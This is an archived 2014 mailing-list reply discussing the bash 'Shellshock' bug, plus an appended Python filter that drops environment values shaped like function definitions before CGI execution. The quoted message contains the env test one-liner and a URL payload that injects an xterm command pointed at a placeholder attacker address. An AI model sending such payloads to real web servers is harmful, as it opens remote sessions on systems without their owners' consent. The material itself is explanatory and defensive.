24 Sep
2014
11:13 a.m.
On 25/09/2014 2:03 pm, Kerry Thompson wrote:
> As I understand it, the problem is significantly worse than that. It's possible to add shell commands after the closing '}' which subsequently get executed by bash, for example:
>
>     env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
>
> - this really should not do what it actually does.
>
> The big risk is in CGI execution under web servers. Apache (and others) automatically add CGI URI arguments as environment variables prior to executing CGI scripts. So if I find a CGI script on your web site, and add "?foo='() { ;;}; xterm -display my.ip.address:0.0'" into the URL

Why would you run an Xserver that is accepting connections from the internet? That seems like a bit of a problem.

-- Steve.
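
An added example, not part of either message: a defensive check that a CGI wrapper could run before handing the environment to bash, flagging and dropping any variable whose value begins like the function definition in the `env x='() { :;}; ...'` test quoted above. The function names and the sample environment are constructed for illustration.

```python
import re

# Unpatched bash imported an environment variable as a shell function when its
# value began with "() {", and then kept executing whatever followed the
# closing brace. Tolerating extra whitespace here is an added, conservative
# assumption so that near-variants are flagged too.
FUNC_PREFIX = re.compile(r"^\s*\(\s*\)\s*\{")


def suspicious_vars(env):
    """Return the sorted names of variables whose value looks like a function definition."""
    return sorted(name for name, value in env.items() if FUNC_PREFIX.match(value))


def scrub_env(env):
    """Return a copy of env with function-definition-like values removed.

    The check is on values, not names: any variable a client can influence
    may carry the payload, so every entry is inspected.
    """
    flagged = set(suspicious_vars(env))
    return {name: value for name, value in env.items() if name not in flagged}


# Constructed sample environment (not captured traffic). The first flagged
# value is the test string from the quoted message.
SAMPLE_CGI_ENV = {
    "REQUEST_METHOD": "GET",
    "PATH_INFO": "/status",
    "QUERY_STRING": "() { :;}; echo vulnerable",
    "SAMPLE_SPACED": "  ( ) { :; }; echo vulnerable",
    "SAMPLE_BENIGN": "note=() { appears mid-value, not at the start",
}

if __name__ == "__main__":
    for name in suspicious_vars(SAMPLE_CGI_ENV):
        print("dropping", name, "=", repr(SAMPLE_CGI_ENV[name]))
    print("passed to CGI script:", sorted(scrub_env(SAMPLE_CGI_ENV)))
```

Filtering like this only reduces exposure on the request path; the fix is a patched bash.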